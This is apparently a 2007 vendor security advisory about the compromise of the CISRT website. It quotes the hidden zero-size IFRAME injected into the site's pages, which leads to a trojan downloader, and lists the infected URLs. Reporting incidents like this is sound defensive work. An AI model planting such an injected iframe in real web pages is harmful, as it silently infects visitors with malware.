China’s on a 7-day holiday, but the Chinese Internet Security Response Team (CISRT) folks may opt to go to work instead because of this issue that has recently plagued their website. A malicious IFRAME tag has wormed its way into CISRT.org’s pages.

Compromised CISRT Web page

We checked the following three CISRT pages and have confirmed that the IFRAME tag exists on all of them:

http:// www. cisrt.org/enblog/read.php?172
http:// www. cisrt.org/enblog/
http:// www. cisrt.org/

*spaces included to prevent accidental clicking. For now (until the sites have been cleaned), users are advised to practice caution when browsing these sites.

The said IFRAME found on the top of the pages is:

iframe src=http://mms.{BLOCKED}mmn.com/99916.htm width=0 height=0 frameborder=0

Even the links posted in some tech-news sites pointing to the CISRT pages mentioned above are compromised!

The compromised pages lead to malicious IFRAMEs that load scripts and more IFRAMEs which eventually download, install and execute a trojan downloader with a filename of sms.exe. This downloader then downloads more malcodes into the infected system.

Trend Micro has already communicated with the good folks at CISRT about this incident. Please stay tuned for more updates regarding this issue.

UPDATE: (2:50 PM, October 2, 2007, GMT -08:00)

It seems the CISRT English Blog page has now been cleaned, but the main page is still hosting the malicious IFRAME.

[Update]

Trend Micro already detects the related codes for the compromised sites as HTML_IFRAME.HS and WORM_FUBALCA.AQ.

Trend Micro users are advised to download the latest pattern file to avoid getting infected by these threats.